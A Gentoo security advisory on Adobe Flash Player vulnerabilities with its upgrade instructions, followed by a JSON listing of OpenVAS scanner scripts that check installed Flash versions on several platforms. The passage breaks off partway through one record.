### Background
The Adobe Flash Player is a renderer for the SWF file format, which is commonly used to provide interactive websites.
### Description
Multiple vulnerabilities have been discovered in Adobe Flash Player. Please review the CVE identifiers referenced below for details.
### Impact
A remote attacker could entice a user to open a specially crafted SWF file using Adobe Flash Player, possibly resulting in execution of arbitrary code with the privileges of the process or a Denial of Service condition. Furthermore, a remote attacker may be able to bypass the Same Origin Policy or read the clipboard via unspecified vectors.
### Workaround
There is no known workaround at this time.
### Resolution
All Adobe Flash Player users should upgrade to the latest version:
```
# emerge --sync
# emerge --ask --oneshot --verbose ">=www-plugins/adobe-flash-11.2.202.356"
```
{"openvas": [{"lastseen": "2019-05-29T18:36:11", "description": "Gentoo Linux Local Security Checks GLSA 201405-04", "cvss3": {}, "published": "2015-09-29T00:00:00", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201405-04", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0509", "CVE-2014-0508", "CVE-2014-0503", "CVE-2014-0515", "CVE-2014-0498", "CVE-2014-0504", "CVE-2014-0507", "CVE-2014-0506", "CVE-2014-0502", "CVE-2014-0499"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310121179", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121179", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201405-04.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121179\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 11:27:06 +0300 (Tue, 29 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201405-04\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities have been discovered in Adobe Flash Player. Please review the CVE identifiers referenced below for details.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201405-04\");\n script_cve_id(\"CVE-2014-0498\", \"CVE-2014-0499\", \"CVE-2014-0502\", \"CVE-2014-0503\", \"CVE-2014-0504\", \"CVE-2014-0506\", \"CVE-2014-0507\", \"CVE-2014-0508\", \"CVE-2014-0509\", \"CVE-2014-0515\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201405-04\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = 
\"\";\n\nif((res=ispkgvuln(pkg:\"www-plugins/adobe-flash\", unaffected: make_list(\"ge 11.2.202.356\"), vulnerable: make_list(\"lt 11.2.202.356\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:38:33", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-10-16T00:00:00", "type": "openvas", "title": "SUSE: Security Advisory for flash-player (SUSE-SU-2014:0535-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0509", "CVE-2014-0508", "CVE-2014-0507", "CVE-2014-0506"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310851050", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851050", "sourceData": "# Copyright (C) 2015 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851050\");\n script_version(\"2020-01-31T07:58:03+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 07:58:03 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-10-16 18:56:30 +0200 (Fri, 16 Oct 2015)\");\n script_cve_id(\"CVE-2014-0506\", \"CVE-2014-0507\", \"CVE-2014-0508\", \"CVE-2014-0509\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SUSE: Security Advisory for flash-player (SUSE-SU-2014:0535-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'flash-player'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Adobe flash-player has been updated to version 11.2.202.350\n to resolve security issues and bugs. 
More information can\n be found at\n\n The following security issues have been fixed:\n\n * a use-after-free vulnerability that could have\n resulted in arbitrary code execution (CVE-2014-0506).\n\n * a buffer overflow vulnerability that could have\n resulted in arbitrary code execution (CVE-2014-0507).\n\n * a security bypass vulnerability that could have lead\n to information disclosure (CVE-2014-0508).\n\n * a cross-site-scripting vulnerability (CVE-2014-0509).\n\n Security Issue references:\n\n * CVE-2014-0506\n\n * CVE-2014-0507\n\n * CVE-2014-0508\n\n * CVE-2014-0509\");\n\n script_tag(name:\"affected\", value:\"flash-player on SUSE Linux Enterprise Desktop 11 SP3\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"SUSE-SU\", value:\"2014:0535-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=SLED11\\.0SP3\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"SLED11.0SP3\") {\n if(!isnull(res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~11.2.202.350~0.3.1\", rls:\"SLED11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"flash-player-gnome\", rpm:\"flash-player-gnome~11.2.202.350~0.3.1\", rls:\"SLED11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"flash-player-kde4\", rpm:\"flash-player-kde4~11.2.202.350~0.3.1\", rls:\"SLED11.0SP3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, 
"vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-22T17:03:08", "description": "This host is installed with Adobe Flash Player and is prone to multiple\nvulnerabilities.", "cvss3": {}, "published": "2014-04-11T00:00:00", "type": "openvas", "title": "Adobe Flash Player Multiple Vulnerabilities - 02 Apr14 (Linux)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0509", "CVE-2014-0508", "CVE-2014-0507"], "modified": "2020-04-20T00:00:00", "id": "OPENVAS:1361412562310804539", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804539", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Multiple Vulnerabilities - 02 Apr14 (Linux)\n#\n# Authors:\n# Thanga Prakash S <tprakash@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804539\");\n script_version(\"2020-04-20T13:31:49+0000\");\n script_cve_id(\"CVE-2014-0507\", \"CVE-2014-0508\", \"CVE-2014-0509\");\n script_bugtraq_id(66701, 66699, 66703);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-04-20 13:31:49 +0000 (Mon, 20 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-04-11 13:13:08 +0530 (Fri, 11 Apr 2014)\");\n script_name(\"Adobe Flash Player Multiple Vulnerabilities - 02 Apr14 (Linux)\");\n\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player and is prone to multiple\nvulnerabilities.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - An error related to regular expressions in ActionScript.\n\n - An use-after-free error and multiple unspecified errors.\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to conduct cross-site scripting\nattacks, bypass certain security restrictions, and compromise a user's system.\");\n script_tag(name:\"affected\", value:\"Adobe Flash Player version before 11.2.202.350 on Linux\");\n script_tag(name:\"solution\", value:\"Update to Adobe Flash Player version 11.2.202.350 or later.\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n 
script_xref(name:\"URL\", value:\"http://secunia.com/advisories/57661\");\n script_xref(name:\"URL\", value:\"http://helpx.adobe.com/security/products/flash-player/apsb14-09.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_lin.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Linux/Ver\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:playerVer, test_version:\"11.2.202.350\"))\n{\n report = report_fixed_ver(installed_version:playerVer, fixed_version:\"11.2.202.350\");\n security_message(port:0, data:report);\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-19T22:14:38", "description": "This host is installed with Adobe Flash Player and is prone to multiple\nvulnerabilities.", "cvss3": {}, "published": "2014-04-11T00:00:00", "type": "openvas", "title": "Adobe Flash Player Multiple Vulnerabilities - 02 Apr14 (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0509", "CVE-2014-0508", "CVE-2014-0507"], "modified": "2019-07-17T00:00:00", "id": "OPENVAS:1361412562310804537", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804537", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Multiple Vulnerabilities - 02 Apr14 (Windows)\n#\n# Authors:\n# Thanga Prakash S <tprakash@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is 
distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804537\");\n script_version(\"2019-07-17T11:14:11+0000\");\n script_cve_id(\"CVE-2014-0507\", \"CVE-2014-0508\", \"CVE-2014-0509\");\n script_bugtraq_id(66701, 66699, 66703);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 11:14:11 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2014-04-11 12:45:39 +0530 (Fri, 11 Apr 2014)\");\n script_name(\"Adobe Flash Player Multiple Vulnerabilities - 02 Apr14 (Windows)\");\n\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player and is prone to multiple\nvulnerabilities.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - An error related to regular expressions in ActionScript.\n\n - An use-after-free error and multiple unspecified errors.\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to conduct cross-site scripting\nattacks, bypass certain security restrictions, and compromise a user's system.\");\n script_tag(name:\"affected\", value:\"Adobe Flash Player version before 11.7.700.275 and 11.8.x through 13.0.x\nbefore 13.0.0.182 on Windows\");\n 
script_tag(name:\"solution\", value:\"Update to Adobe Flash Player version 11.7.700.275 or 13.0.0.182 or later.\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/57661\");\n script_xref(name:\"URL\", value:\"http://helpx.adobe.com/security/products/flash-player/apsb14-09.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_win.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Win/Installed\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:playerVer, test_version:\"11.7.700.275\") ||\n version_in_range(version:playerVer, test_version:\"11.8.0\", test_version2:\"13.0.0.181\"))\n{\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-19T22:14:14", "description": "This host is installed with Adobe Flash Player and is prone to multiple\nvulnerabilities.", "cvss3": {}, "published": "2014-04-11T00:00:00", "type": "openvas", "title": "Adobe Flash Player Multiple Vulnerabilities - 02 Apr14 (Mac OS X)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0509", "CVE-2014-0508", "CVE-2014-0507"], "modified": "2019-07-17T00:00:00", "id": "OPENVAS:1361412562310804538", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804538", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Multiple Vulnerabilities - 02 Apr14 (Mac OS X)\n#\n# Authors:\n# Thanga Prakash S <tprakash@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 
Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804538\");\n script_version(\"2019-07-17T11:14:11+0000\");\n script_cve_id(\"CVE-2014-0507\", \"CVE-2014-0508\", \"CVE-2014-0509\");\n script_bugtraq_id(66701, 66699, 66703);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 11:14:11 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2014-04-11 13:09:05 +0530 (Fri, 11 Apr 2014)\");\n script_name(\"Adobe Flash Player Multiple Vulnerabilities - 02 Apr14 (Mac OS X)\");\n\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player and is prone to multiple\nvulnerabilities.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - An error related to regular expressions in ActionScript.\n\n - An use-after-free error and multiple unspecified errors.\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow 
attackers to conduct cross-site scripting\nattacks, bypass certain security restrictions, and compromise a user's system.\");\n script_tag(name:\"affected\", value:\"Adobe Flash Player version before 11.7.700.275 and 11.8.x through 13.0.x\nbefore 13.0.0.182 on Mac OS X\");\n script_tag(name:\"solution\", value:\"Update to Adobe Flash Player version 11.7.700.275 or 13.0.0.182 or later.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/57661\");\n script_xref(name:\"URL\", value:\"http://helpx.adobe.com/security/products/flash-player/apsb14-09.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Adobe/Flash/Player/MacOSX/Version\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:playerVer, test_version:\"11.7.700.275\") ||\n version_in_range(version:playerVer, test_version:\"11.8.0\", test_version2:\"13.0.0.181\"))\n{\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:37:28", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-10-16T00:00:00", "type": "openvas", "title": "SUSE: Security Advisory for flash-player (SUSE-SU-2014:0290-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0498", "CVE-2014-0502", "CVE-2014-0499"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310851089", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851089", "sourceData": "# Copyright (C) 2015 Greenbone Networks GmbH\n# Text 
descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851089\");\n script_version(\"2020-01-31T07:58:03+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 07:58:03 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-10-16 19:45:17 +0200 (Fri, 16 Oct 2015)\");\n script_cve_id(\"CVE-2014-0498\", \"CVE-2014-0499\", \"CVE-2014-0502\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SUSE: Security Advisory for flash-player (SUSE-SU-2014:0290-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'flash-player'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update of Adobe Flash Player fixes the following\n issues:\n\n * A stack overflow vulnerability that could have\n resulted in arbitrary code execution. 
(CVE-2014-0498)\n\n * A memory leak vulnerability that could have been used\n to defeat memory address layout randomization.\n (CVE-2014-0499)\n\n * A double free vulnerability that could have resulted\n in arbitrary code execution. (CVE-2014-0502)\n\n Security Issue references:\n\n * CVE-2014-0498\n\n * CVE-2014-0499\n\n * CVE-2014-0502\");\n\n script_tag(name:\"affected\", value:\"flash-player on SUSE Linux Enterprise Desktop 11 SP3\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"SUSE-SU\", value:\"2014:0290-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=SLED11\\.0SP3\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"SLED11.0SP3\") {\n if(!isnull(res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~11.2.202.341~0.3.1\", rls:\"SLED11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"flash-player-gnome\", rpm:\"flash-player-gnome~11.2.202.341~0.3.1\", rls:\"SLED11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"flash-player-kde4\", rpm:\"flash-player-kde4~11.2.202.341~0.3.1\", rls:\"SLED11.0SP3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-12-12T11:09:53", "description": "Check for the Version of flash-player", "cvss3": {}, "published": "2014-02-25T00:00:00", "type": "openvas", "title": "SuSE Update for flash-player 
openSUSE-SU-2014:0278-1 (flash-player)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0498", "CVE-2014-0502", "CVE-2014-0499"], "modified": "2017-12-08T00:00:00", "id": "OPENVAS:850571", "href": "http://plugins.openvas.org/nasl.php?oid=850571", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2014_0278_1.nasl 8044 2017-12-08 08:32:49Z santu $\n#\n# SuSE Update for flash-player openSUSE-SU-2014:0278-1 (flash-player)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(850571);\n script_version(\"$Revision: 8044 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-08 09:32:49 +0100 (Fri, 08 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-02-25 16:47:57 +0530 (Tue, 25 Feb 2014)\");\n script_cve_id(\"CVE-2014-0498\", \"CVE-2014-0499\", \"CVE-2014-0502\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SuSE Update for flash-player openSUSE-SU-2014:0278-1 (flash-player)\");\n\n tag_insight = \"\n Adobe Flash Player was updated to 11.2.202.341: (bnc#865021)\n * APSB14-07, CVE-2014-0498 CVE-2014-0499 CVE-2014-0502\n - Contents of flashplayer_11_sa.i386.tar.gz changed back:\n spec file updated, supplementary script (update.sh)\n updated.\";\n\n tag_affected = \"flash-player on openSUSE 11.4\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"openSUSE-SU\", value: \"2014:0278_1\");\n script_summary(\"Check for the Version of flash-player\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n 
script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"openSUSE11.4\")\n{\n\n if ((res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~11.2.202.341~95.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"flash-player-gnome\", rpm:\"flash-player-gnome~11.2.202.341~95.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"flash-player-kde4\", rpm:\"flash-player-kde4~11.2.202.341~95.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-04-22T17:03:34", "description": "This host is installed with Adobe Flash Player and is prone to multiple\nvulnerabilities.", "cvss3": {}, "published": "2014-02-24T00:00:00", "type": "openvas", "title": "Adobe Flash Player Multiple Vulnerabilities - 01 Feb14 (Linux)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0498", "CVE-2014-0502", "CVE-2014-0499"], "modified": "2020-04-20T00:00:00", "id": "OPENVAS:1361412562310903340", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310903340", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Multiple Vulnerabilities - 01 Feb14 (Linux)\n#\n# Authors:\n# Thanga Prakash S <tprakash@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 SecPod, http://www.secpod.com\n#\n# 